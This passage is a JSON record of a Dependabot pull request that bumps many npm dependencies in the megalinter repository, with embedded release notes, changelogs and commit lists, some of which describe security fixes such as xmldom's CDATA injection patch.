truncated_","html_url":"https://github.com/oxsecurity/megalinter/pull/7612","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/oxsecurity%2Fmegalinter/issues/7612","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7612/packages"},{"uuid":"4262602711","node_id":"PR_kwDOJkwVw87SVOwM","number":17,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 39 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-15T23:34:35.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-14T14:07:19.000Z","updated_at":"2026-04-15T23:34:37.000Z","time_to_close":120436,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":39,"packages":[{"name":"@xmldom/xmldom","old_version":"0.8.7","new_version":"0.8.12","repository_url":"https://github.com/xmldom/xmldom"},{"name":"fast-xml-parser","old_version":"4.2.2","new_version":"4.5.6","repository_url":"https://github.com/NaturalIntelligence/fast-xml-parser"},{"name":"glob","old_version":"10.2.3","new_version":"10.5.0","repository_url":"https://github.com/isaacs/node-glob"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jsonpath","old_version":"1.1.1","new_version":"1.3.0","repository_url":"https://github.com/dchester/jsonpath"},{"name":"path-to-regexp","old_version":"6.2.1","new_version":"6.3.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"path-to-regexp","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/pillarjs/path-to-regexp"},{"name":"express","old_version":"4.18.2","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.4","repository_url":"https://github.com/form-data/form-data"},{"name":"@babel/runtime-corejs3","old_version":"7.13.9","new_version":"7.29.2","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.17.0","new_version":"11.4.4-cjs.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.8","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"ws","old_version":"6.2.2","new_version":"6.2.3","repository_url":"https://github.com/websockets/ws"},{"name":"flatted","old_version":"3.2.2","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"socket.io-parser","old_version":"3.3.3","new_version":"3.3.5","repository_url":"https://github.com/socketio/socket.io"},{"name":"get-func-name","old_version":"2.0.0","new_version":"2.0.2","repository_url":"https://github.com/chaijs/get-func-name"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"sharp","old_version":"0.30.7","new_version":"0.32.6","repository_url":"https://github.com/lovell/sharp"},{"name":"svgo","old_version":"2.8.0","new_version":"2.8.2","repository_url":"https://github.com/svg/svgo"},{"name":"tar-fs","old_version":"2.1.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"},{"name":"word-wrap","old_version":"1.2.3","new_version":"1.2.5","repository_url":"https://github.com/jonschlinkert/word-wrap"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.8.7` | `0.8.12` |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.2.2` | `4.5.6` |\n| [glob](https://github.com/isaacs/node-glob) | `10.2.3` | `10.5.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [jsonpath](https://github.com/dchester/jsonpath) | `1.1.1` | `1.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `6.2.1` | `6.3.0` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `1.8.0` | `1.9.0` |\n| [express](https://github.com/expressjs/express) | `4.18.2` | `4.22.1` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.4` |\n| [@babel/runtime-corejs3](https://github.com/babel/babel/tree/HEAD/packages/babel-runtime-corejs3) | `7.13.9` | `7.29.2` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.17.0` | `11.4.4-cjs.2` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.8` | `1.1.14` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [ws](https://github.com/websockets/ws) | `6.2.2` | `6.2.3` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.2` | `3.4.2` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `3.3.3` | `3.3.5` |\n| [get-func-name](https://github.com/chaijs/get-func-name) | `2.0.0` | `2.0.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [sharp](https://github.com/lovell/sharp) | `0.30.7` | `0.32.6` |\n| [svgo](https://github.com/svg/svgo) | `2.8.0` | `2.8.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.1.1` | `2.1.4` |\n| [word-wrap](https://github.com/jonschlinkert/word-wrap) | `1.2.3` | `1.2.5` |\n\nBumps the npm_and_yarn group with 1 update in the /.github/actions/close-bot directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@xmldom/xmldom` from 0.8.7 to 0.8.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/discussions/357\"\u003ehttps://github.com/xmldom/xmldom/discussions/357\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.8.11\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.9...0.8.10\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edom: prevent iteration over deleted items \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/514\"\u003e\u003ccode\u003e[#514](https://github.com/xmldom/xmldom/issues/514)\u003c/code\u003e\u003c/a\u003e/ \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/499\"\u003e\u003ccode\u003e[#499](https://github.com/xmldom/xmldom/issues/499)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/qtow\"\u003e\u003ccode\u003e@​qtow\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.9\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.8...0.8.9\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSet nodeName property in ProcessingInstruction \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/509\"\u003e\u003ccode\u003e[#509](https://github.com/xmldom/xmldom/issues/509)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/505\"\u003e\u003ccode\u003e[#505](https://github.com/xmldom/xmldom/issues/505)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/cjbarth\"\u003e\u003ccode\u003e@​cjbarth\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.8\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.8\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e\u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003e0.8.12\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.10...0.8.11\"\u003e0.8.11\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate \u003ccode\u003eownerDocument\u003c/code\u003e when moving nodes between documents \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/933\"\u003e\u003ccode\u003e[#933](https://github.com/xmldom/xmldom/issues/933)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/932\"\u003e\u003ccode\u003e[#932](https://github.com/xmldom/xmldom/issues/932)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you, \u003ca href=\"https://github.com/shunkica\"\u003e\u003ccode\u003e@​shunkica\u003c/code\u003e\u003c/a\u003e, for your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.7\"\u003e0.9.8\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: replace \\u2029 as part of normalizeLineEndings \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/839\"\u003e\u003ccode\u003e[#839](https://github.com/xmldom/xmldom/issues/839)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eperf: speed up line detection \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/847\"\u003e\u003ccode\u003e[#847](https://github.com/xmldom/xmldom/issues/847)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/838\"\u003e\u003ccode\u003e[#838](https://github.com/xmldom/xmldom/issues/838)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003cli\u003edrop jazzer and rxjs devDependencies \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/845\"\u003e\u003ccode\u003e[#845](https://github.com/xmldom/xmldom/issues/845)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/kboshold\"\u003e\u003ccode\u003e@​kboshold\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/Ponynjaa\"\u003e\u003ccode\u003e@​Ponynjaa\u003c/code\u003e\u003c/a\u003e,\nfor your contributions.\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.6...0.9.7\"\u003e0.9.7\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImplementation of \u003ccode\u003ehasAttributes\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/804\"\u003e\u003ccode\u003e[#804](https://github.com/xmldom/xmldom/issues/804)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003elocator is now true even when other options are being used for the DOMParser \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/802\"\u003e\u003ccode\u003e[#802](https://github.com/xmldom/xmldom/issues/802)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/803\"\u003e\u003ccode\u003e[#803](https://github.com/xmldom/xmldom/issues/803)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/189cb78a83e81e1515880988a399e863a8be85ac\"\u003e\u003ccode\u003e189cb78\u003c/code\u003e\u003c/a\u003e 0.8.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ed08df7572f4236d4fd88d16063c3fd8f59c7884\"\u003e\u003ccode\u003eed08df7\u003c/code\u003e\u003c/a\u003e fix: XML injection via unsafe CDATA serialization (GHSA-wh4c-j3r5-mjhp) (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/968\"\u003e#968\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/a5b929ba008f067eeabb427c38de008e36a92796\"\u003e\u003ccode\u003ea5b929b\u003c/code\u003e\u003c/a\u003e chore: clean up generated test artefacts before running ci-local\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/4e37a205627a08eb64365b13c4e4cce5e86278cb\"\u003e\u003ccode\u003e4e37a20\u003c/code\u003e\u003c/a\u003e ci: run format:check in lint job\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac0ac7714f0e5a7bd7aff5c30f7733666cf03982\"\u003e\u003ccode\u003eac0ac77\u003c/code\u003e\u003c/a\u003e chore: ignore generated files when checking formatting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/968c8939438eec2eca1d003b333cd0fc4595c72d\"\u003e\u003ccode\u003e968c893\u003c/code\u003e\u003c/a\u003e chore: add local CI script and format:check script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/ac40424adfa49429811095bcdaf6598255a81a39\"\u003e\u003ccode\u003eac40424\u003c/code\u003e\u003c/a\u003e fix: preserve trailing whitespace in ProcessingInstruction data (\u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/962\"\u003e#962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cece7521a3c77da7a10f3fc66521e3e077c9974c\"\u003e\u003ccode\u003ecece752\u003c/code\u003e\u003c/a\u003e chore: add .nvmrc pointing to node version 18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbf44d90a40703237d217598fa0bcd88770bfa0b\"\u003e\u003ccode\u003ecbf44d9\u003c/code\u003e\u003c/a\u003e docs: improve links to changes in most recent release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c0f14011c7cf93af60b2541898065b7136594f6b\"\u003e\u003ccode\u003ec0f1401\u003c/code\u003e\u003c/a\u003e 0.8.11\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.7...0.8.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-xml-parser` from 4.2.2 to 4.5.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/releases\"\u003efast-xml-parser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eSummary update on all the previous releases from v4.2.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMultiple minor fixes provided in the validator and parser\u003c/li\u003e\n\u003cli\u003ev6 is added for experimental use.\u003c/li\u003e\n\u003cli\u003eignoreAttributes support function, and array of string or regex\u003c/li\u003e\n\u003cli\u003eAdd support for parsing HTML numeric entities\u003c/li\u003e\n\u003cli\u003ev5 of the application is ESM module now. However, JS is also supported\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eNote\u003c/strong\u003e: Release section in not updated frequently. Please check \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md\"\u003eCHANGELOG\u003c/a\u003e or \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/tags\"\u003eTags\u003c/a\u003e for latest release information.\u003c/p\u003e\n\u003ch2\u003eSecurity Fix\u003c/h2\u003e\n\u003cp\u003eUpdate to this release if you use entity parsing in Fast XML Parser.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/42fbb0bc95e753e03fe52cb0805a8774bba4bf28\"\u003e\u003ccode\u003e42fbb0b\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/805671cb6c19108b171b876cf3e8865f18cdb8fd\"\u003e\u003ccode\u003e805671c\u003c/code\u003e\u003c/a\u003e increase expansion limit as many system need it\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/9a2cf097c2961d4ad878f618e39fb0a9f5a0e9e5\"\u003e\u003ccode\u003e9a2cf09\u003c/code\u003e\u003c/a\u003e update version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221\"\u003e\u003ccode\u003e88d0936\u003c/code\u003e\u003c/a\u003e apply all fixes from v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/d4eb6b4713a8d11e6730943392419040898ecbc0\"\u003e\u003ccode\u003ed4eb6b4\u003c/code\u003e\u003c/a\u003e update release version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/b1b9f633ff30cb4708337355c2789f08bc0558d2\"\u003e\u003ccode\u003eb1b9f63\u003c/code\u003e\u003c/a\u003e update release info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/faccca126e1db96b90084adda6fbe2ea2ed434e7\"\u003e\u003ccode\u003efaccca1\u003c/code\u003e\u003c/a\u003e sync with v5.3.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/ab00cdc49c681b44effbe95d6ee4392616a74aaa\"\u003e\u003ccode\u003eab00cdc\u003c/code\u003e\u003c/a\u003e update package bundle for minor fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/57c61876b47be10616ba47da904c8add26efcb58\"\u003e\u003ccode\u003e57c6187\u003c/code\u003e\u003c/a\u003e Update ReadMe\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/commit/caeda37ebd919c799bf06ccf2f80d1e90e99d474\"\u003e\u003ccode\u003ecaeda37\u003c/code\u003e\u003c/a\u003e fix: emit full JSON string from CLI when no output filename specified (\u003ca href=\"https://redirect.github.com/NaturalIntelligence/fast-xml-parser/issues/710\"\u003e#710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/NaturalIntelligence/fast-xml-parser/compare/4.2.2...v4.5.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.2.3 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-glob/blob/main/changelog.md\"\u003eglob's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003echangeglob\u003c/h1\u003e\n\u003ch2\u003e13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMove the CLI program out to a separate package, \u003ccode\u003eglob-bin\u003c/code\u003e.\nInstall that if you'd like to continue using glob from the\ncommand line.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemove the unsafe \u003ccode\u003e--shell\u003c/code\u003e option. The \u003ccode\u003e--shell\u003c/code\u003e option is now\nONLY supported on known shells where the behavior can be\nimplemented 